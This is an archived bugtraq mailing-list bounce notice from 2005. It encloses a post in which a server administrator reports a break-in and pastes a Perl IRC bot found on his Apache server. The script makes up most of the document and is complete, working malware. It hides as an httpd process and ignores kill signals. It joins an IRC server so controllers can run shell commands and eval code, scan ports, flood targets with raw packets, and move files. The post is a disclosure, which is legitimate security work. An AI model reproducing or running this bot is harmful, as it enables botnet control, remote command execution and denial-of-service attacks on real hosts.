[38862] in bugtraq
ezmlm warning
daemon@ATHENA.MIT.EDU (bugtraq-help@securityfocus.com)
Fri May 13 18:41:47 2005
Date: 13 May 2005 15:10:00 -0000
Message-ID: <1115997000.1521.ezmlm-warn@securityfocus.com>
From: bugtraq-help@securityfocus.com
To: bugtraq-redist@mit.edu
Content-type: text/plain; charset=us-ascii
Hi! This is the ezmlm program. I'm managing the
bugtraq@securityfocus.com mailing list.
I'm working for my owner, who can be reached
at bugtraq-owner@securityfocus.com.
Messages to you from the bugtraq mailing list seem to
have been bouncing. I've attached a copy of the first bounce
message I received.
If this message bounces too, I will send you a probe. If the probe bounces,
I will remove your address from the bugtraq mailing list,
without further notice.
I've kept a list of which messages from the bugtraq mailing list have
bounced from your address.
Copies of these messages may be in the archive.
To retrieve a set of messages 123-145 (a maximum of 100 per request),
send an empty message to:
<bugtraq-get.123_145@securityfocus.com>
To receive a subject and author list for the last 100 or so messages,
send an empty message to:
<bugtraq-index@securityfocus.com>
Here are the message numbers:
19513
19531
--- Enclosed is a copy of the bounce message I received.
Return-Path: <>
Received: (qmail 12835 invoked from network); 1 May 2005 17:59:40 -0000
Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
by lists2.securityfocus.com with SMTP; 1 May 2005 17:59:40 -0000
Received: from mail.securityfocus.com (mail.securityfocus.com [205.206.231.9])
by outgoing2.securityfocus.com (Postfix) with SMTP id 330211470D2
for <bugtraq-return-19513-bugtraq-redist=mit.edu@lists2.securityfocus.com>; Sun, 1 May 2005 19:13:30 -0600 (MDT)
Received: (qmail 3527 invoked by alias); 2 May 2005 01:04:02 -0000
Received: (qmail 31714 invoked from network); 2 May 2005 01:02:29 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
by mail.securityfocus.com with SMTP; 2 May 2005 01:02:29 -0000
Received: by outgoing3.securityfocus.com (Postfix)
id 028492373BE; Sun, 1 May 2005 19:11:59 -0600 (MDT)
Date: Sun, 1 May 2005 19:11:59 -0600 (MDT)
From: MAILER-DAEMON@securityfocus.com (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: bugtraq-return-19513-bugtraq-redist=mit.edu@securityfocus.com
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="90CFD2372AB.1114996300/outgoing3.securityfocus.com"
Message-Id: <20050502011159.028492373BE@outgoing3.securityfocus.com>
This is a MIME-encapsulated message.
--90CFD2372AB.1114996300/outgoing3.securityfocus.com
Content-Description: Notification
Content-Type: text/plain
This is the Postfix program at host outgoing3.securityfocus.com.
I'm sorry to have to inform you that your message could not be
be delivered to one or more recipients. It's attached below.
For further assistance, please send mail to <postmaster>
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The Postfix program
<bugtraq-redist@mit.edu>: host PACIFIC-CARRIER-ANNEX.mit.edu[18.7.21.83] said:
554 5.7.1 Message contains Perl/Shellbot virus, not accepted (in reply to
end of DATA command)
--90CFD2372AB.1114996300/outgoing3.securityfocus.com
Content-Description: Delivery report
Content-Type: message/delivery-status
Reporting-MTA: dns; outgoing3.securityfocus.com
X-Postfix-Queue-ID: 90CFD2372AB
X-Postfix-Sender: rfc822; bugtraq-return-19513@securityfocus.com
Arrival-Date: Fri, 29 Apr 2005 14:53:20 -0600 (MDT)
Final-Recipient: rfc822; bugtraq-redist@mit.edu
Action: failed
Status: 4.0.0
Diagnostic-Code: X-Postfix; host PACIFIC-CARRIER-ANNEX.mit.edu[18.7.21.83]
said: 554 5.7.1 Message contains Perl/Shellbot virus, not accepted (in
reply to end of DATA command)
--90CFD2372AB.1114996300/outgoing3.securityfocus.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 90CFD2372AB; Fri, 29 Apr 2005 14:53:20 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3797 invoked from network); 29 Apr 2005 11:34:59 -0000
Date: Fri, 29 Apr 2005 14:03:58 -0500
From: Andrew Y Ng <ayn@AndrewNg.com>
To: bugtraq@securityfocus.com
Subject: Apache hacks (./atac, d0s.txt)
Message-ID: <20050429190358.GA3757@AndrewNg.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="PNTmBPCT7hxwcZjr"
Content-Disposition: inline
X-GPG-Fingerprint: 46A1 29FF 893A 0381 DC81 1E1E BED8 E882 9BFC 594C
X-GPG-Info: gpg --keyserver pgp.mit.edu --recv-keys 9BFC594C
X-Copyright: (C) 2004 Andrew Y Ng. Forwarding not permitted without prior permission.
User-Agent: Mutt/1.5.6+20040907i
--PNTmBPCT7hxwcZjr
Content-Type: text/plain; charset=unknown-8bit
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
My server has been seeing some usual activities today, I don't have much ti=
me
to get down to the bottom of things, but after I investigated briefly I have
decided to disable PERL executable permission for www-data (Apache process's
user), also locked /var/tmp so www-data cannot write to it.=20
Looks like it ignores all the `kill` signals, not sure how I can actually
kill it...
I found the included script in /var/tmp called d0s.txt.
I found a bunch of processes called ./atac 20 running, and found the
following content in /tmp/atac:
http://andrewng.com/tmp/atac.tbz
here's d0s.txt:
#!/usr/bin/perl
################ CONFIGURACAO #############################################=
####################
my $processo =3D '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo q=
ue vai aparece no ps #
#----------------------------------------------############################=
####################
my $MODOME=3D'+pi'; # Modo Do Bot =
# =20
#----------------------------------------------############################=
####################
my $linas_max=3D'10'; # Evita o flood :) depois =
de X linhas #
#----------------------------------------------############################=
####################
my $sleep=3D'3'; # ele dorme X segundos =
#
##################### IRC #################################################=
####################
my @adms=3D("DDOS"); # Nick do administrador =
#
#----------------------------------------------############################=
####################
my @canais=3D("#bots ddos");# Canais #
#----------------------------------------------############################=
####################
my $nick=3D'b0t'; # Nick do bot. Caso esteja em u=
so vai aparecer #
# # aparecer com numero radona=
mico no final #
#----------------------------------------------############################=
####################
my $ircname =3D 'b0t'; # User ID =
#
#----------------------------------------------############################=
####################
my $realname =3D '=02=034A=02dmin=0314: =034=02=1F#=02=1FD=02D=02OS=0F=0F';=
#
#----------------------------------------------############################=
####################
$servidor=3D'irc.gigachat.net' unless $servidor; # Servidor de irc que vai =
ser usado #
# # caso n=E3o seja especifica=
do no argumento #
#----------------------------------------------############################=
####################
my $porta=3D'6667'; # Porta do servidor de irc =
#
################ ACESSO A SHELL ###########################################=
####################
my $secv =3D 1; # 1/0 pra habilita/desabilit=
a acesso a shell #
###########################################################################=
####################
my $VERSAO =3D '1.0';
$SIG{'INT'} =3D 'IGNORE';
$SIG{'HUP'} =3D 'IGNORE';
$SIG{'TERM'} =3D 'IGNORE';
$SIG{'CHLD'} =3D 'IGNORE';
$SIG{'PS'} =3D 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor=3D"$ARGV[0]" if $ARGV[0];
$0=3D"$processo"."\0"x16;;
my $pid=3Dfork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel =3D new IO::Select->new();
$sel_cliente =3D IO::Select->new();
sub sendraw {
if ($#_ =3D=3D '1') {
my $socket =3D $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick =3D $_[0];
my $servidor_con =3D $_[1];
my $porta_con =3D $_[2];
my $IRC_socket =3D IO::Socket::INET->new(Proto=3D>"tcp", PeerAddr=3D>"$s=
ervidor_con", PeerPort=3D>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket =3D $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} =3D "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} =3D "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} =3D $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} =3D $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realn=
ame");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta")=
; }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready =3D $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket =3D $fh;
$meunick =3D $irc_servers{$IRC_cur_socket}{'nick'};
$nread =3D sysread($fh, $msg, 4096);
if ($nread =3D=3D 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines =3D split (/\n/, $msg);
for(my $c=3D0; $c<=3D $#lines; $c++) {
$line =3D $lines[$c];
$line=3D$line_temp.$line if ($line_temp);
$line_temp=3D'';
$line =3D~ s/\r$//;
unless ($c =3D=3D $#lines) {
parse("$line");
} else {
if ($#lines =3D=3D 0) {
parse("$line");
} elsif ($lines[$c] =3D~ /\r$/) {
parse("$line");
} elsif ($line =3D~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp =3D $line;
}
}
}
}
}
=20
sub parse {
my $servarg =3D shift;
if ($servarg =3D~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =3D~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=3D$1; my $onde =3D $4; my $args =3D $5;
if ($args =3D~ /^\001VERSION\001$/) {
notice("$pn", "\001Bot powered by DDOS TEAM\001");
}
if (grep {$_ =3D~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =3D~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
my $natrix =3D $1;
my $arg =3D $2;
if ($arg =3D~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg=
=3D~ /^\!nick/);
} elsif ($arg =3D~ /^\@(.*)/) {
$ondep =3D $onde;
$ondep =3D $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}=20
}
} elsif ($servarg =3D~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=3D$4;=20
$irc_servers{$IRC_cur_socket}{'nick'} =3D $meunick;
}
} elsif ($servarg =3D~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =3D~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick =3D $2;
$irc_servers{$IRC_cur_socket}{'nick'} =3D $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} =3D "$1";
foreach my $canal (@canais) {
print "$0 Executado \n";
sendraw("JOIN $canal");
sendraw("MODE $meunick $MODOME");
sendraw("PRIVMSG $canal :Modo Alterado Para=034 $MODOME");
}
}
}
sub bfunc {
my $printl =3D $_[0];
my $funcarg =3D $_[1];
if (my $pid =3D fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =3D~ /^portscan (.*)/) {
my $hostip=3D"$1";
my @portas=3D("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock =3D IO::Socket::INET->new(PeerAddr =3D> $hosti=
p, PeerPort =3D> $porta, Proto =3D> 'tcp', Timeout =3D> 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @=
aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta ab=
erta foi encontrada");=20
}
}
if ($funcarg =3D~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my ($dtime, %pacotes) =3D attacker("$1", "$2", "$3");
$dtime =3D 1 if $dtime =3D=3D 0;
my %bytes;
$bytes{igmp} =3D $2 * $pacotes{igmp};
$bytes{icmp} =3D $2 * $pacotes{icmp};
$bytes{o} =3D $2 * $pacotes{o};
$bytes{udp} =3D $2 * $pacotes{udp};
$bytes{tcp} =3D $2 * $pacotes{tcp};
=20
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dti=
me"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M=E9dia de envi=
o\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dt=
ime)." kbps");
}
exit;
}
}
}
=20
sub ircase {
my ($kem, $printl, $case) =3D @_;
if ($case =3D~ /^join (.*)/) {
j("$1");
}=20
if ($case =3D~ /^part (.*)/) {
p("$1");
}
if ($case =3D~ /^rejoin\s+(.*)/) {
my $chan =3D $1;
if ($chan =3D~ /^(\d+) (.*)/) {
for (my $ca =3D 1; $ca <=3D $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =3D~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg =3D substr($case, 3);
op("$1", "$2") if ($oarg =3D~ /(\S+)\s+(\S+)/);
}
if ($case =3D~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg =3D substr($case, 5);
deop("$1", "$2") if ($oarg =3D~ /(\S+)\s+(\S+)/);
}
if ($case =3D~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg =3D substr($case, 6);
voice("$1", "$2") if ($oarg =3D~ /(\S+)\s+(\S+)/);
}
if ($case =3D~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg =3D substr($case, 8);
devoice("$1", "$2") if ($oarg =3D~ /(\S+)\s+(\S+)/);
}
if ($case =3D~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =3D~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf =3D 1; $cf <=3D $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =3D~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =3D~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf =3D 1; $cf <=3D $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =3D~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
if ($case =3D~ /^nick (.*)/) {
nick("$1");
}
if ($case =3D~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =3D~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
if ($case =3D~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =3D~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
return unless $secv;
my $printl=3D$_[0];
my $comando=3D$_[1];
if ($comando =3D~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diert=F3rio inexistente!");
return;
}=20
elsif ($pid =3D fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=3D`$comando 2>&1 3>&1`;
my $c=3D0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c =3D=3D "$linas_max") {
$c=3D0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr =3D inet_aton($_[0]);
my $msg =3D 'B' x $_[1];
my $ftime =3D $_[2];
my $cp =3D 0;
my (%pacotes);
$pacotes{icmp} =3D $pacotes{igmp} =3D $pacotes{udp} =3D $pacotes{o} =3D $=
pacotes{tcp} =3D 0;
=20
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp =3D=3D 4;
my $itime =3D time;
my ($cur_time);
while ( 1 ) {
for (my $porta =3D 1; $porta <=3D 65000; $porta++) {
$cur_time =3D time - $itime;
last if $cur_time >=3D $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}=
++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}+=
+;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}=
++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}+=
+;
# DoS ?? :P
for (my $pc =3D 3; $pc <=3D 255;$pc++) {
next if $pc =3D=3D 6;
$cur_time =3D time - $itime;
last if $cur_time >=3D $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}+=
+;;
}
}
last if $cur_time >=3D $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ =3D=3D 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ =3D=3D 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ =3D=3D 1;
sendraw("PRIVMSG $_[0] :$_[1]");
} =20
sub notice {
return unless $#_ =3D=3D 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ =3D=3D 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ =3D=3D 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ =3D=3D 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ =3D=3D 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ =3D=3D 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ =3D=3D 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ =3D=3D 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ =3D=3D 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ =3D=3D 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ =3D=3D 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ =3D=3D 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ =3D=3D 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ =3D=3D 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ =3D=3D 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ =3D=3D 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ =3D=3D 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ =3D=3D 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
}
# DCC
package DCC;
sub connections {
my @ready =3D $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo =3D $DCC{$fh}{tipo};
my $arquivo =3D $DCC{$fh}{arquivo};
my $bytes =3D $DCC{$fh}{bytes};
my $cur_byte =3D $DCC{$fh}{curbyte};
my $nick =3D $DCC{$fh}{nick};
my $msg;
my $nread =3D sysread($fh, $msg, 10240);
if ($nread =3D=3D 0 and $dcctipo =3D~ /^(get|sendcon)$/) {
$DCC{$fh}{status} =3D "Cancelado";
$DCC{$fh}{ftime} =3D time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} +=3D length($msg);
my $cur_byte =3D $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <=3D $bytes);
close(FILE);
my $packbyte =3D pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes =3D=3D $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} =3D "Recebido";
$DCC{$fh}{ftime} =3D time;
next;
}
} elsif ($dcctipo eq "send") {
my $send =3D $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} =3D 'sendcon';
$DCC{$send}{itime} =3D time;
$DCC{$send}{nick} =3D $nick;
$DCC{$send}{bytes} =3D $bytes;
$DCC{$send}{curbyte} =3D 0;
$DCC{$send}{arquivo} =3D $arquivo;
$DCC{$send}{ip} =3D $send->peerhost;
$DCC{$send}{porta} =3D $send->peerport;
$DCC{$send}{status} =3D "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com=
o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended =3D unpack("N", $msg);
$DCC{$fh}{curbyte} =3D $bytes_sended;
if ($bytes_sended =3D=3D $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} =3D "Enviado";
$DCC{$fh}{ftime} =3D time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) =3D @_;
unless (-r "$arquivo") {
return(0);
}
=20
my $dccark =3D $arquivo;
$dccark =3D~ s/[.*\/](\S+)/$1/;
my $meuip =3D $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip =3D unpack("N",inet_aton($meuip));
my @filestat =3D stat($arquivo);
my $size_total=3D$filestat[7];
if ($size_total =3D=3D 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta =3D int rand(64511);
$porta +=3D 1024;
$sendsock =3D IO::Socket::INET->new(Listen=3D>1, LocalPort =3D>$porta, =
Proto =3D> 'tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} =3D 'send';
$DCC{$sendsock}{nick} =3D $nick;
$DCC{$sendsock}{bytes} =3D $size_total;
$DCC{$sendsock}{arquivo} =3D $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) =3D @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {=20
return(0);=20
}
my $dccip=3Dfixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock =3D IO::Socket::INET->new(Proto=3D>"tcp", PeerAddr=3D>$dccip,=
PeerPort=3D>$dccporta, Timeout=3D>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} =3D 'get';
$DCC{$dccsock}{itime} =3D time;
$DCC{$dccsock}{nick} =3D $nick;
$DCC{$dccsock}{bytes} =3D $bytes;
$DCC{$dccsock}{curbyte} =3D 0;
$DCC{$dccsock}{arquivo} =3D $arquivo;
$DCC{$dccsock}{ip} =3D $dccip;
$DCC{$dccsock}{porta} =3D $dccporta;
$DCC{$dccsock}{status} =3D "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acord=
o com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket =3D shift;
my $sock_tipo =3D $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick =3D $DCC{$socket}{nick};
my $arquivo =3D $DCC{$socket}{arquivo};
my $itime =3D $DCC{$socket}{itime};
my $ftime =3D time;
my $status =3D $DCC{$socket}{status};
$ftime =3D $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time =3D $ftime-$itime;
my $cur_byte =3D $DCC{$socket}{curbyte};
my $bytes_total =3D $DCC{$socket}{bytes};
my $rate =3D 0;
$rate =3D ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen =3D ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =3D~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv =3D $3; $r_duv++ if $4 >=3D 5;
$rate =3D "$1\.$2"."$r_duv";
}
if ($porcen =3D~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv =3D $3; $p_duv++ if $4 >=3D 5;
$porcen =3D "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_=
byte","$d_time", "$rate", "$porcen");
}
return(0);
}
sub fixaddr {
my ($address) =3D @_;
chomp $address; # just in case, sigh.
if ($address =3D~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =3D~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]=
?\d{1,2}$/) {
return $address;
} elsif ($address =3D~ tr/a-zA-Z//) { =20
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}
--=20
andrew y ng <ayn@andrewng.com> http://andrewng.com
principal, ayn & associates, llc, http://aynassociates.com
--PNTmBPCT7hxwcZjr
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQFCcoUevtjogpv8WUwRAkH9AJ4sBNiPB39FPXWqFv4iUtWkn3BG4gCdFfzG
rUhOVVLWdKJn3djBCUsI1nA=
=oy5w
-----END PGP SIGNATURE-----
--PNTmBPCT7hxwcZjr--
--90CFD2372AB.1114996300/outgoing3.securityfocus.com--
